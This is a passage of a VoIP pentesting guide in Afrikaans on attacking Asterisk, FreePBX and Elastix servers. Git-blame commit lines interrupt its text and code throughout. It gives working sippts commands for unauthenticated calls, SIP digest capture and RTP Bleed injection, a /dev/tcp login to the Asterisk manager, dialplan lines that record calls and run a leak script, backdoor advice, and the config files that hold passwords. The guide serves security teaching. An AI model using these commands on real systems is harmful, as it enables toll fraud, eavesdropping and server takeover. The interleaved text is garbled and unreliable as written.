```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
If 'n IP-adres is gespesifiseer, sal die gasheer **nie REGISTER** versoeke elke nou en dan hoef te stuur nie (in die REGISTER-pakket word die tyd om te lewe gestuur, gewoonlik 30min, wat beteken dat die telefoon in 'n ander scenario elke 30min moet REGISTER). Dit sal egter oop poorte moet hê wat verbindings van die VoIP-bediener toelaat om oproepe te ontvang.
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Om gebruikers te definieer kan hulle as volg gedefinieer word:
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`type=user`**: Die gebruiker kan slegs oproepe as gebruiker ontvang.
* **`type=friend`**: Dit is moontlik om oproepe as peer te maak en dit as gebruiker te ontvang (gebruik met uitbreidings)
* **`type=peer`**: Dit is moontlik om oproepe as peer te stuur en te ontvang (SIP-trunks)
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Dit is ook moontlik om vertroue te vestig met die onveilige veranderlike:
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* **`insecure=port`**: Laat peer verbindings wat deur IP geverifieer word.
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`insecure=invite`**: Vereis nie verifikasie vir INVITE-boodskappe nie
* **`insecure=port,invite`**: Albei
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
{% hint style="warning" %}
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Wanneer **`type=friend`** gebruik word, sal die **waarde** van die **host** veranderlike **nie gebruik word** nie, so as 'n admin **'n SIP-trunk verkeerd konfigureer** met daardie waarde, **sal enigiemand in staat wees om daartoe te verbind**.
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Byvoorbeeld, hierdie konfigurasie sal kwesbaar wees:\
GITBOOK-3876: change request with no subject merged in GitBook
2023-04-17 15:36:54 +00:00
`host=10.10.10.10`\
`insecure=port,invite`\
`type=friend`
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Gratis Oproepe / Asterisks Konteks Misconfigurasies
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
In Asterisk is 'n **konteks** 'n benoemde houer of afdeling in die kiesplan wat **verwante uitbreidings, aksies en reëls groepeer**. Die kiesplan is die kernkomponent van 'n Asterisk-stelsel, aangesien dit definieer **hoe inkomende en uitgaande oproepe hanteer en gerouteer word**. Konteks word gebruik om die kiesplan te organiseer, toegangbeheer te bestuur, en skeiding tussen verskillende dele van die stelsel te bied.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Elke konteks word in die konfigurasie-lêer gedefinieer, tipies in die **`extensions.conf`** lêer. Konteks word aangedui deur vierkante hakies, met die konteksnaam binne-in. Byvoorbeeld:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```bash
csharpCopy code[my_context]
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Binnen die konteks definieer jy uitbreidings (patrone van gedialde nommers) en assosieer dit met 'n reeks aksies of toepassings. Hierdie aksies bepaal hoe die oproep verwerk word. Byvoorbeeld:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Hierdie voorbeeld demonstreer 'n eenvoudige konteks genoem "my\_context" met 'n uitbreiding "100". Wanneer iemand 100 kies, sal die oproep beantwoord word, 'n welkomstekst sal gespeel word, en dan sal die oproep beëindig word.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dit is **nog 'n konteks** wat toelaat om **na enige ander nommer te bel**:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
As die admin die **default context** definieer as:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```
[default]
include => my_context
include => external
```
{% hint style="warning" %}
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Enigeen sal in staat wees om die **bediener te gebruik om na enige ander nommer te bel** (en die admin van die bediener sal vir die oproep betaal).
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
{% endhint %}
{% hint style="danger" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Boonop bevat die **`sip.conf`** lêer standaard **`allowguest=true`**, dan sal **enige** aanvaller met **geen outentisering** in staat wees om na enige ander nommer te bel.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
{% endhint %}
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* **`SIPPTS invite`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite kontroleer of 'n **PBX bediener ons toelaat om oproepe te maak sonder outentisering**. As die SIP bediener 'n onakkurate konfigurasie het, sal dit ons toelaat om oproepe na eksterne nommers te maak. Dit kan ons ook toelaat om die oproep na 'n tweede eksterne nommer oor te dra.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Byvoorbeeld, as jou Asterisk bediener 'n slegte kontekskonfigurasie het, kan jy INVITE versoek aanvaar sonder outorisasie. In hierdie geval kan 'n aanvaller oproepe maak sonder om enige gebruiker/wagwoord te ken.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```
{% endcode %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Gratis oproepe / Foutief geconfigureerde IVRS
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
IVRS staan vir **Interaktiewe Stem Respons Stelsel**, 'n telekommunikasietegnologie wat gebruikers toelaat om met 'n gekompliseerde stelsel te kommunikeer deur middel van stem of toetsingang. IVRS word gebruik om **geoutomatiseerde oproep hantering** stelsels te bou wat 'n reeks funksies bied, soos om inligting te verskaf, oproepe te roete, en gebruikersinvoer te vang.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'cryptog
2024-07-17 18:34:48 +00:00
IVRS in VoIP stelsels bestaan tipies uit:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
1. **Stem aanwysings**: Vooraf opgeneemde klankboodskappe wat gebruikers deur die IVR-menu opsies en instruksies lei.
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
2. **DTMF** (Dubbeltoon Multi-Frekwensie) sein: Toetsingang wat gegenereer word deur sleutels op die telefoon te druk, wat gebruik word om deur die IVR-menu's te navigeer en invoer te verskaf.
3. **Oproep roetering**: Oproepe na die toepaslike bestemming lei, soos spesifieke departemente, agente, of uitbreidings gebaseer op gebruikersinvoer.
4. **Gebruikersinvoer vang**: Inligting van belers versamel, soos rekeningnommers, saak-ID's, of enige ander relevante data.
5. **Integrasie met eksterne stelsels**: Die IVR-stelsel aan databasisse of ander sagteware stelsels koppel om toegang tot of inligting op te dateer, aksies uit te voer, of gebeurtenisse te aktiveer.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
In 'n Asterisk VoIP-stelsel kan jy 'n IVR skep met die kiesplan (**`extensions.conf`** lêer) en verskeie toepassings soos `Background()`, `Playback()`, `Read()`, en meer. Hierdie toepassings help jou om stem aanwysings te speel, gebruikersinvoer te vang, en die oproepvloei te beheer.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
#### Voorbeeld van kwesbare konfigurasie
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Die vorige is 'n voorbeeld waar die gebruiker gevra word om **1 te druk om** 'n departement te bel, **2 om** 'n ander te bel, of **die volledige uitbreiding** as hy dit weet.\
Die kwesbaarheid is die feit dat die aangeduide **uitbreiding lengte nie nagegaan word nie, so 'n gebruiker kan die 5 sekondes tydsduur 'n volledige nommer invoer en dit sal gebel word.**
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Uitbreiding Inspuiting
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Gebruik 'n uitbreiding soos:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
exten => _X.,1,Dial(SIP/${EXTEN})
```
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Waar **`${EXTEN}`** die **uitbreiding** is wat gebel sal word, wanneer die **ext 101 bekendgestel word** sal dit gebeur:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
exten => 101,1,Dial(SIP/101)
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Daarom sal 'n oproep na die uitbreiding **`101`** en **`123123123`** gestuur word en slegs die eerste een wat die oproep ontvang, sal gevestig word... maar as 'n aanvaller 'n **uitbreiding gebruik wat enige ooreenkoms omseil** wat uitgevoer word, maar nie bestaan nie, kan hy **slegs 'n oproep na die gewenste nommer inspuit**.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
## SIPDigestLeak kwesbaarheid
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Die SIP Digest Leak is 'n kwesbaarheid wat 'n groot aantal SIP Telefone beïnvloed, insluitend beide hardeware en sagteware IP Telefone sowel as telefoonadapters (VoIP na analoog). Die kwesbaarheid laat **lek van die Digest-authentikasie antwoord** toe, wat bereken word vanaf die wagwoord. 'n **Aflyn wagwoordaanval is dan moontlik** en kan die meeste wagwoorde op grond van die uitdaging antwoord herstel.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
**[Kwetsbaarheid scenario van hier**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
1. 'n IP Telefoon (slagoffer) luister op enige poort (byvoorbeeld: 5060), wat telefoonoproepe aanvaar
2. Die aanvaller stuur 'n INVITE na die IP Telefoon
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
3. Die slagoffer telefoon begin lui en iemand neem op en hang op (omdat niemand die telefoon aan die ander kant antwoord nie)
4. Wanneer die telefoon opgehang word, stuur die **slagoffer telefoon 'n BYE na die aanvaller**
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
5. Die **aanvaller gee 'n 407 antwoord** wat **om authentikasie vra** en 'n authentikasie uitdaging uitreik
6. Die **slagoffer telefoon bied 'n antwoord op die authentikasie uitdaging** in 'n tweede BYE
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
7. Die **aanvaller kan dan 'n brute-force aanval** op die uitdaging antwoord op sy plaaslike masjien (of verspreide netwerk ens.) uitvoer en die wagwoord raai
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **SIPPTS lek** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS lek benut die SIP Digest Leak kwesbaarheid wat 'n groot aantal SIP Telefone beïnvloed. Die uitvoer kan in SipCrack-formaat gestoor word om dit te bruteforce met SIPPTS dcrack of die SipCrack hulpmiddel.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts leak -i 10.10.0.10
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100
[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
... waiting for BYE ...
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok
Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Click2Call
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Click2Call laat 'n **webgebruiker** (wat byvoorbeeld dalk in 'n produk belangstel) toe om sy **telefoonnommer** in te voer om gebel te word. Dan sal 'n kommersiële oproep gemaak word, en wanneer hy **die telefoon opneem** sal die gebruiker **gebel en met die agent verbind word**.
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
'n Algemene Asterisk-profiel hiervoor is:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```scss
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* Die vorige profiel laat **ENIGE IP adres toe om te verbind** (as die wagwoord bekend is).
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
* Om 'n **oproep te organiseer**, soos voorheen gespesifiseer, is **geen leesregte nodig nie** en **slegs** **oorsprong** in **skryf** is nodig.
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Met daardie regte kan enige IP wat die wagwoord ken verbind en te veel inligting onttrek, soos:
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% code overflow="wrap" %}
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
```bash
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
```
{% endcode %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**Meer inligting of aksies kan aangevra word.**
GITBOOK-3877: change request with no subject merged in GitBook
2023-04-18 04:09:32 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### **Afluister**
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
In Asterisk is dit moontlik om die opdrag **`ChanSpy`** te gebruik wat die **verlenging(e) om te monitor** (of al die verlengings) aandui om gesprekke te hoor wat plaasvind. Hierdie opdrag moet aan 'n verlenging toegeken word.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Byvoorbeeld, **`exten => 333,1,ChanSpy('all',qb)`** dui aan dat as jy die **verlenging 333** **bel**, dit **alle** verlengings sal **monitor**, **begin luister** wanneer 'n nuwe gesprek begin (**`b`**) in stilmodus (**`q`**) aangesien ons nie wil interaksie hê nie. Jy kan van een gesprek na 'n ander beweeg deur **`*`** te druk, of deur die verlenging nommer te merk.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dit is ook moontlik om **`ExtenSpy`** te gebruik om slegs een verlenging te monitor.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
In plaas daarvan om die gesprekke te luister, is dit moontlik om hulle in lêers te **registreer** deur 'n verlenging soos:
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
{% code overflow="wrap" %}
```scss
[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})
```
{% endcode %}
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
Telefonskakels sal gestoor word in **`/tmp`**.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
Jy kan selfs Asterisk **'n skrip uitvoer wat die oproep sal lek** wanneer dit gesluit word.
GITBOOK-3878: change request with no subject merged in GitBook
2023-04-18 14:22:56 +00:00
```scss
exten => h,1,System(/tmp/leak_conv.sh &)
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### RTCPBleed kwesbaarheid
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
**RTCPBleed** is 'n groot sekuriteitskwessie wat Asterisk-gebaseerde VoIP-bedieners raak (gepubliseer in 2017). Die kwesbaarheid laat **RTP (Real Time Protocol) verkeer**, wat VoIP-gesprekke dra, toe om **geïntcepteer en hergerig te word deur enige iemand op die Internet**. Dit gebeur omdat RTP-verkeer outentisering omseil wanneer dit deur NAT (Network Address Translation) vuurmure navigeer.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
RTP-proxies probeer om **NAT-beperkings** wat RTC-stelsels raak, aan te spreek deur RTP-strome tussen twee of meer partye te proxy. Wanneer NAT in plek is, kan die RTP-proxy sagteware dikwels nie staatmaak op die RTP IP- en poortinligting wat deur signalering verkry is nie (bv. SIP). Daarom het 'n aantal RTP-proxies 'n mekanisme geïmplementeer waar sulke **IP- en poort-tuplet outomaties geleer word**. Dit word dikwels gedoen deur inkomende RTP-verkeer te inspekteer en die bron-IP en poort vir enige inkomende RTP-verkeer te merk as die een wat op geantwoord moet word. Hierdie mekanisme, wat "leer-modus" genoem kan word, **maak nie gebruik van enige vorm van outentisering nie**. Daarom kan **aanvallers** **RTP-verkeer na die RTP-proxy stuur** en die geproksiede RTP-verkeer ontvang wat bedoel is vir die beler of ontvanger van 'n aanhoudende RTP-stroom. Ons noem hierdie kwesbaarheid RTP Bleed omdat dit aanvallers toelaat om RTP-media strome te ontvang wat bedoel is om aan wettige gebruikers gestuur te word.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
'n Ander interessante gedrag van RTP-proxies en RTP-stakke is dat hulle soms, **selfs al is hulle nie kwesbaar vir RTP Bleed nie**, **RTP-pakkette van enige bron sal aanvaar, deurstuur en/of verwerk**. Daarom kan aanvallers RTP-pakkette stuur wat hulle mag toelaat om hul media in plaas van die wettige een in te spuit. Ons noem hierdie aanval RTP-inspuiting omdat dit die inspuiting van onwettige RTP-pakkette in bestaande RTP-strome toelaat. Hierdie kwesbaarheid kan in beide RTP-proxies en eindpunte gevind word.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Asterisk en FreePBX het tradisioneel die **`NAT=yes` instelling** gebruik, wat RTP-verkeer toelaat om outentisering te omseil, wat moontlik lei tot geen klank of eenrigting-klank op oproepe nie.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Vir meer inligting, kyk na [https://www.rtpbleed.com/](https://www.rtpbleed.com/)
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS rtpbleed`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleed detecteer die RTP Bleed kwesbaarheid deur RTP-strome te stuur.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts rtpbleed -i 10.10.0.10
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS rtcpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtcpbleed detecteer die RTP Bleed kwesbaarheid deur RTCP-strome te stuur.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts rtcpbleed -i 10.10.0.10
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
* **`SIPPTS rtpbleedflood`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedflood benut die RTP Bleed kwesbaarheid deur RTP-strome te stuur.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`SIPPTS rtpbleedinject`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject benut die RTP Bleed kwesbaarheid deur 'n klanklêer (WAV-formaat) in te spuit.
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```bash
Translated ['network-services-pentesting/pentesting-voip/README.md'] to
2024-06-03 13:34:04 +00:00
sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
GITBOOK-3881: change request with no subject merged in GitBook
2023-04-23 19:20:09 +00:00
```
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
### RCE
Translated ['README.md', 'generic-methodologies-and-resources/python/byp
2024-11-09 13:55:18 +00:00
In Asterisk slaag jy op een of ander manier daarin om **uitbreidingsreëls by te voeg en dit te herlaai** (byvoorbeeld deur 'n kwesbare webbestuurder bediener te kompromitteer), dit is moontlik om RCE te verkry met die **`System`** opdrag.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
```scss
same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
{% hint style="warning" %}
Translated ['README.md', 'binary-exploitation/format-strings/README.md',
2024-11-09 13:28:06 +00:00
As die bediener **bepaalde karakters** in die **`System`** opdrag (soos in Elastix) **verbied**, kyk of die webbediener toelaat om **lêers op een of ander manier binne die stelsel te skep** (soos in Elastix of trixbox), en gebruik dit om 'n **backdoor-skrip** te **skep** en gebruik dan **`System`** om daardie **skrip** te **voeren**.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
#### Interessante plaaslike lêers en toestemmings
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`sip.conf`** -> Bevat die wagwoord van SIP gebruikers.
* As die **Asterisk bediener as root loop**, kan jy root in gevaar stel.
* **mysql root gebruiker** mag **geen wagwoord hê** nie.
* dit kan gebruik word om 'n nuwe mysql gebruiker as backdoor te skep.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
* **`FreePBX`**
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`amportal.conf`** -> Bevat die wagwoord van die webpaneel administrateur (FreePBX).
* **`FreePBX.conf`** -> Bevat die wagwoord van die gebruiker FreePBXuser wat gebruik word om toegang tot die databasis te verkry.
* dit kan gebruik word om 'n nuwe mysql gebruiker as backdoor te skep.
GITBOOK-3880: change request with no subject merged in GitBook
2023-04-19 03:00:28 +00:00
* **`Elastix`**
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **`Elastix.conf`** -> Bevat verskeie wagwoorde in duidelike teks soos mysql root wagwoord, IMAPd wagwoord, web admin wagwoord.
